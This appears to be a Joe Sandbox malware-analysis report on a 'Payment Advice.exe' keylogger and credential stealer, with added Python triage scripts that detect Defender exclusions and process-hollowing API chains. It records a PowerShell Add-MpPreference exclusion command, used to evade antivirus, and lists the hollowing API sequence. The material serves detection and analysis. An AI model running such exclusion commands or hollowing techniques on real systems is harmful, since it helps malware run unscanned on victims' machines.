2025-03-05 12:08:22 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo



Target ID: 0
Start time: 07:08:16
Start date: 05/03/2025
Path: C:\Users\user\Desktop\Payment Advice.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Payment Advice.exe"
Imagebase: 0xa20000
File size: 594'432 bytes
MD5 hash: 78EC5A1E11EE68C95A5E339FD492C90E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1764232871.0000000003D99000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1764232871.0000000003DD1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation: low
Has exited: true

                                                                      Target ID:2
                                                                      Start time:07:08:18
                                                                      Start date:05/03/2025
                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment Advice.exe"
                                                                      Imagebase:0x890000
                                                                      File size:433'152 bytes
                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true
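                                                                      The Target ID 2 entry above shows powershell.exe, running with administrator privileges, calling Add-MpPreference -ExclusionPath on the sample's own path under the user's Desktop, which leaves the dropped payload unscanned by Defender. The script below is an added triage example, not part of the Joe Sandbox report or of the sample; it parses process entries in the report's Key:Value layout (one blank line between processes) and flags every exclusion argument passed to Add-MpPreference, decoding -EncodedCommand payloads first. The embedded report text is constructed: the first block mirrors the Target ID 2 entry, while the Target ID 7 block is hypothetical and exists only to exercise the base64/UTF-16LE decoding path. The list of user-writable path prefixes is an assumption of the example.

```python
"""Added triage helper: find Defender exclusions carved by Add-MpPreference in the
per-process blocks of a Joe Sandbox report, including -EncodedCommand variants."""
import base64
import re

# Constructed sample in the report's layout. Target ID 2 mirrors the entry in
# this report; Target ID 7 is hypothetical, its encoded command is built inline.
_ENCODED = base64.b64encode(
    'Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Local\\Temp"'
    .encode("utf-16le")).decode()

SAMPLE_REPORT = f"""
Target ID:2
Path:C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe
Commandline:"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" Add-MpPreference -ExclusionPath "C:\\Users\\user\\Desktop\\Payment Advice.exe"
Has administrator privileges:true

Target ID:7
Path:C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Commandline:powershell.exe -nop -w hidden -enc {_ENCODED}
Has administrator privileges:true

Target ID:4
Path:C:\\Windows\\System32\\conhost.exe
Commandline:C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1
Has administrator privileges:true
"""

# Short forms of -EncodedCommand commonly seen on the command line.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# -ExclusionPath / -ExclusionProcess / -ExclusionExtension with a quoted or bare value.
EXCL_RE = re.compile(
    r'-Exclusion(Path|Process|Extension)\s+(?:"([^"]*)"|\'([^\']*)\'|(\S+))', re.I)
# Assumption: locations a standard user can write to without elevation.
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\temp\\")


def parse_process_blocks(text):
    """Split report text into one dict per process; Yara bullet lines are skipped."""
    procs, cur = [], {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            if cur:
                procs.append(cur)
                cur = {}
            continue
        if ":" in line and not line.startswith("•"):
            key, value = line.split(":", 1)   # values such as C:\... contain colons
            cur[key.strip()] = value.strip()
    if cur:
        procs.append(cur)
    return procs


def effective_commandline(cmd):
    """Append the decoded payload of any -EncodedCommand (base64 of UTF-16LE)."""
    m = ENC_RE.search(cmd)
    if not m:
        return cmd
    try:
        decoded = base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmd
    return cmd + " " + decoded


def is_user_writable(path):
    return path.lower().replace("/", "\\").startswith(USER_WRITABLE_PREFIXES)


def find_defender_exclusions(report_text):
    """One finding per exclusion argument handed to Add-MpPreference."""
    findings = []
    for proc in parse_process_blocks(report_text):
        raw_cmd = proc.get("Commandline", "")
        cmd = effective_commandline(raw_cmd)
        if not re.search(r"\bAdd-MpPreference\b", cmd, re.I):
            continue
        for m in EXCL_RE.finditer(cmd):
            value = next(g for g in m.groups()[1:] if g is not None)
            findings.append({
                "target": proc.get("Target ID"),
                "kind": m.group(1),
                "value": value,
                "user_writable": is_user_writable(value),
                "encoded": bool(ENC_RE.search(raw_cmd)),
                "admin": proc.get("Has administrator privileges") == "true",
            })
    return findings


if __name__ == "__main__":
    for finding in find_defender_exclusions(SAMPLE_REPORT):
        print(finding)
```

                                                                      Feed the text of a full report to find_defender_exclusions; the combination worth alerting on is an elevated process excluding a path under the user profile, because that is exactly what lets a dropped executable run unscanned. The decoder is applied before matching so that an exclusion hidden behind -enc is reported the same way as the plaintext one seen in this report.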

                                                                      Target ID:3
                                                                      Start time:07:08:18
                                                                      Start date:05/03/2025
                                                                      Path:C:\Users\user\Desktop\Payment Advice.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Users\user\Desktop\Payment Advice.exe"
                                                                      Imagebase:0x270000
                                                                      File size:594'432 bytes
                                                                      MD5 hash:78EC5A1E11EE68C95A5E339FD492C90E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:4
                                                                      Start time:07:08:18
                                                                      Start date:05/03/2025
                                                                      Path:C:\Windows\System32\conhost.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:862'208 bytes
                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:5
                                                                      Start time:07:08:18
                                                                      Start date:05/03/2025
                                                                      Path:C:\Users\user\Desktop\Payment Advice.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\Payment Advice.exe"
                                                                      Imagebase:0xe60000
                                                                      File size:594'432 bytes
                                                                      MD5 hash:78EC5A1E11EE68C95A5E339FD492C90E
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Source: 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2994910866.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2996681350.0000000003523000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:false


                                                                        Execution Graph

                                                                        Execution Coverage:8.4%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:221
                                                                        Total number of Limit Nodes:12
                                                                        execution_graph (rendered graph omitted; the report lists 221 nodes). Entry nodes and the API calls reachable from each:
                                                                        • 110d360 (01100000 dump): GetCurrentProcess, GetCurrentThread, GetCurrentThreadId
                                                                        • 5fc3cb8: DrawTextExW
                                                                        • 796bca0: PostMessageW
                                                                        • 110d5a8: DuplicateHandle
                                                                        • 1104668: CreateActCtxA, GetModuleHandleW
                                                                        • 7969b4c (07960000 dump): CreateProcessA, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, Wow64SetThreadContext, ResumeThread; this is the sequence that creates a suspended process, writes a new image into it and resumes it
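                                                                        From entry node 7969b4c in the 07960000 dump, the execution graph reaches CreateProcessA, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, Wow64SetThreadContext and ResumeThread, the API sequence a loader uses to start a suspended process, replace its image and resume it. The script below is an added example, not part of the Joe Sandbox report or of the sample's code; it parses the graph's token layout (node id, address, optional API name or "N API calls" annotation, and src->dst edges) and flags every entry node from which that chain is reachable. The embedded edge list is a constructed, trimmed excerpt that reuses ids and addresses from this report, and the set of APIs treated as the hollowing chain is an assumption of the example.

```python
"""Added triage helper: parse a Joe Sandbox execution_graph edge list and flag
entry nodes from which a process-hollowing API chain is reachable."""
import re
from collections import defaultdict

NODE_RE = re.compile(r"^\d+$")                                  # graph node id
ADDR_RE = re.compile(r"^[0-9a-f]+$")                            # address after a node id
API_RE = re.compile(r"^[A-Z][A-Za-z0-9]*[a-z][A-Za-z0-9]*$")    # Win32 API name

# Constructed excerpt in the report's token layout; ids and addresses follow the
# 07960000 and 01100000 dumps of this report but the list is trimmed.
SAMPLE_GRAPH = """
41114 7969b4c 41115 796996c 41114->41115 41136 796a9a0 41115->41136
41137 796a9a5 41136->41137 41138 796afb5 2 API calls 41137->41138
41121 796a9a4 41115->41121 41166 796afb5 41121->41166 41171 796afe9 41121->41171
41175 796b149 41121->41175 41185 796ae85 41121->41185 41203 796b51a 41121->41203
41212 796afdd 41121->41212 41223 79692c8 WriteProcessMemory 41166->41223
41231 7968cf8 Wow64SetThreadContext 41171->41231 41239 7968c48 ResumeThread 41175->41239
41247 79695d9 CreateProcessA 41185->41247 41255 7969248 VirtualAllocEx 41203->41255
41263 7969403 ReadProcessMemory 41212->41263
41270 110d360 41271 110d3a6 GetCurrentProcess 41270->41271
41278 110d493 GetCurrentThreadId 41271->41278
"""


def parse_graph(text):
    """Return (labels, adjacency): labels[node] = [address, *annotations]."""
    labels, adj = {}, defaultdict(set)
    tokens, i, current = text.split(), 0, None
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:
            src, dst = tok.split("->")
            adj[int(src)].add(int(dst))
            current = None                       # annotations end at an edge
        elif (NODE_RE.match(tok) and i + 1 < len(tokens)
              and ADDR_RE.match(tokens[i + 1])):
            current = int(tok)                   # "id address" starts a node
            labels[current] = [tokens[i + 1]]
            i += 1
        elif current is not None:
            labels[current].append(tok)          # API name or "2 API calls"
        i += 1
    return labels, adj


def roots(labels, adj):
    """Entry nodes: defined nodes that no edge points to."""
    targets = {d for dsts in adj.values() for d in dsts}
    return [n for n in labels if n not in targets]


def reachable_apis(start, labels, adj):
    """Depth-first walk collecting API names on every node reachable from start."""
    seen, stack, apis = set(), [start], set()
    while stack:
        node = stack.pop()
        if node in seen:
            continue
        seen.add(node)
        apis.update(t for t in labels.get(node, [])[1:] if API_RE.match(t))
        stack.extend(adj.get(node, ()))
    return apis


# Assumption: this combination is treated as a process-hollowing chain.
HOLLOWING_CORE = {"VirtualAllocEx", "WriteProcessMemory", "ResumeThread"}


def is_hollowing_chain(apis):
    """CreateProcess* + remote alloc/write + (Wow64)SetThreadContext + ResumeThread."""
    return (bool(apis & {"CreateProcessA", "CreateProcessW"})
            and HOLLOWING_CORE <= apis
            and bool(apis & {"SetThreadContext", "Wow64SetThreadContext"}))


def find_hollowing(text):
    """(entry address, sorted APIs) for every entry node that reaches the chain."""
    labels, adj = parse_graph(text)
    hits = []
    for root in roots(labels, adj):
        apis = reachable_apis(root, labels, adj)
        if is_hollowing_chain(apis):
            hits.append((labels[root][0], sorted(apis)))
    return hits


if __name__ == "__main__":
    for addr, apis in find_hollowing(SAMPLE_GRAPH):
        print(addr, ", ".join(apis))
```

                                                                        Reachability rather than exact call order is used on purpose: the graph interleaves wrapper nodes ("2 API calls") and duplicate stubs for the same API, so requiring a fixed order would miss the chain. Wow64SetThreadContext is accepted alongside SetThreadContext because a 32-bit loader on a 64-bit host, as in this report, goes through the WOW64 variant.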
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1767590838.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7960000_Payment Advice.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 053ef30d94b00caddd73067feefae5fd4202875ed15a0c25d8f7b1453d56a9f7
                                                                        • Instruction ID: 61766a9a84888898b1b152078e78b81eaeeeedd0aefda74238dafdb52af124f3
                                                                        • Opcode Fuzzy Hash: 053ef30d94b00caddd73067feefae5fd4202875ed15a0c25d8f7b1453d56a9f7
                                                                        • Instruction Fuzzy Hash: CA213AB1E0561A8BDB18CF67C9056EEFFFBAFCA300F04D17AD409A6664DB7405468A90

                                                                        Control-flow Graph

                                                                        control_flow_graph (rendered graph omitted): basic blocks 110d350-110d52d; calls in order GetCurrentProcess, GetCurrentThread, GetCurrentProcess, call 110d530, GetCurrentThreadId
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 0110D3DE
                                                                        • GetCurrentThread.KERNEL32 ref: 0110D41B
                                                                        • GetCurrentProcess.KERNEL32 ref: 0110D458
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0110D4B1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1761719665.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1100000_Payment Advice.jbxd
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID:
                                                                        • API String ID: 2063062207-0
                                                                        • Opcode ID: 797919f943004a8b39242b229f0df97fe892c4a2866eccc7ccdc4ed12ae591e3
                                                                        • Instruction ID: 0c72a41247eca3107931b6d98ea41c83f3b9def7df503a8021f3d403d7985196
                                                                        • Opcode Fuzzy Hash: 797919f943004a8b39242b229f0df97fe892c4a2866eccc7ccdc4ed12ae591e3
                                                                        • Instruction Fuzzy Hash: 5A5166B09012498FDB18CFAAD948BEEBFF1EF88314F248459E409A7390DB746940CF65

                                                                        Control-flow Graph

                                                                        control_flow_graph (rendered graph omitted): basic blocks 110d360-110d52d; calls in order GetCurrentProcess, GetCurrentThread, GetCurrentProcess, call 110d530, GetCurrentThreadId
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 0110D3DE
                                                                        • GetCurrentThread.KERNEL32 ref: 0110D41B
                                                                        • GetCurrentProcess.KERNEL32 ref: 0110D458
                                                                        • GetCurrentThreadId.KERNEL32 ref: 0110D4B1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1761719665.0000000001100000.00000040.00000800.00020000.00000000.sdmp, Offset: 01100000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1100000_Payment Advice.jbxd
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID:
                                                                        • API String ID: 2063062207-0
                                                                        • Opcode ID: ac311e0f50c8221b859abd56f3fbfa9f4ab79a8a95607b2c476b3cedb83c884b
                                                                        • Instruction ID: 06e103be6d275585430db852616f7079a153a2db81c474096b7446a0c903b31c
                                                                        • Opcode Fuzzy Hash: ac311e0f50c8221b859abd56f3fbfa9f4ab79a8a95607b2c476b3cedb83c884b
                                                                        • Instruction Fuzzy Hash: 4B5154B0D012498FDB18CFAAD948BEEBFF1EF88314F248459E409A7390DB746844CB61

                                                                        Control-flow Graph

                                                                        control_flow_graph (rendered graph omitted): basic blocks 7969546-7969895; CreateProcessA called from block 79696df-7969799
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07969786
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1767590838.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7960000_Payment Advice.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: 1bb8f596afef2736e0fa96eda9e0a98ed27d88ec0902ace18492dbbd0ef33415
                                                                        • Instruction ID: 86fff997d5e167c486af87c8fe4cc7ea99b9142a2ad30284786fb4cb064b91ca
                                                                        • Opcode Fuzzy Hash: 1bb8f596afef2736e0fa96eda9e0a98ed27d88ec0902ace18492dbbd0ef33415
                                                                        • Instruction Fuzzy Hash: ABA15CB1D0075ADFDB24CF69C845BEDBBB6BF48324F048269D809A7240DB74A985CF91

                                                                        Control-flow Graph

                                                                        control_flow_graph (rendered graph omitted): basic blocks 7969550-7969895; CreateProcessA called from block 79696df-7969799
                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07969786
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1767590838.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7960000_Payment Advice.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcess
                                                                        • String ID:
                                                                        • API String ID: 963392458-0
                                                                        • Opcode ID: 98fd82b64b17a3d4cdf484f9e68341b11c1bc7739e72729fd4ce9c003d1f29e2
                                                                        • Instruction ID: 45bdb92fcf1ab66fffb0cfdd1b330ab763a47255df7da9fe8630f45bdc5cf808
                                                                        • Opcode Fuzzy Hash: 98fd82b64b17a3d4cdf484f9e68341b11c1bc7739e72729fd4ce9c003d1f29e2
                                                                        • Instruction Fuzzy Hash: B8915CB1D0075ACFDF24CF69C845BEDBAB6BF48324F048269D809A7240DB74A985CF91

                                                                        Control-flow Graph

                                                                        control_flow_graph (rendered graph omitted; listing truncated in the report): basic blocks from 110b0c8; calls 1109b40, 110b350 or 110b360, 110ad58, 110ad68, and GetModuleHandleW from block 110b300-110b32b